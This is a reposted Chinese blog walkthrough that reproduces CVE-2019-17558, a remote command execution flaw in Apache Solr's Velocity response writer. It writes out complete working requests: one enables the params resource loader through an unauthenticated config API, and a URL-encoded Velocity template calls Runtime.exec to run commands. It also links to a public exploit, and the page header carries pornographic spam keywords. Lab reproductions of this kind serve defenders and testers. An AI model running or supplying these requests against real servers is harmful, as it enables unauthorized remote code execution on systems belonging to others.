日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)

發布時間:2025/3/15 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞描述

Solr是Apache Lucene項目的開源企業搜索平臺。 其主要功能包括全文檢索、命中標示、分面搜索、動態聚類、數據庫集成,以及富文本的處理。 2019年10月30日,國外安全研究人員放出了一個關于solr 模板注入的exp,攻擊者通過未授權訪問solr服務器,發送特定的數據包開啟 params.resource.loader.enabled,然后get訪問接口導致服務器命令執行。

影響版本

5.0.0 到 8.3.1版本

漏洞環境

搭建環境,服務啟動后,訪問http://your-ip:8983即可查看到一個無需權限的Apache Solr服務。

漏洞復現

默認情況下params.resource.loader.enabled配置未打開,無法使用自定義模板。我們先通過如下API獲取所有的核心:

http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json

通過如下請求開啟params.resource.loader.enabled,其中API路徑包含剛才獲取的core名稱:

POST /solr/demo/config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259{"update-queryresponsewriter": {"startup": "lazy","name": "velocity","class": "solr.VelocityResponseWriter","template.base.dir": "","solr.resource.loader.enabled": "true","params.resource.loader.enabled": "true"} }

之后,注入Velocity模板即可執行任意命令:

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

測試結果:

使用EXP?進行漏洞利用:https://github.com/jas502n/solr_rce

總結

以上是生活随笔為你收集整理的Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。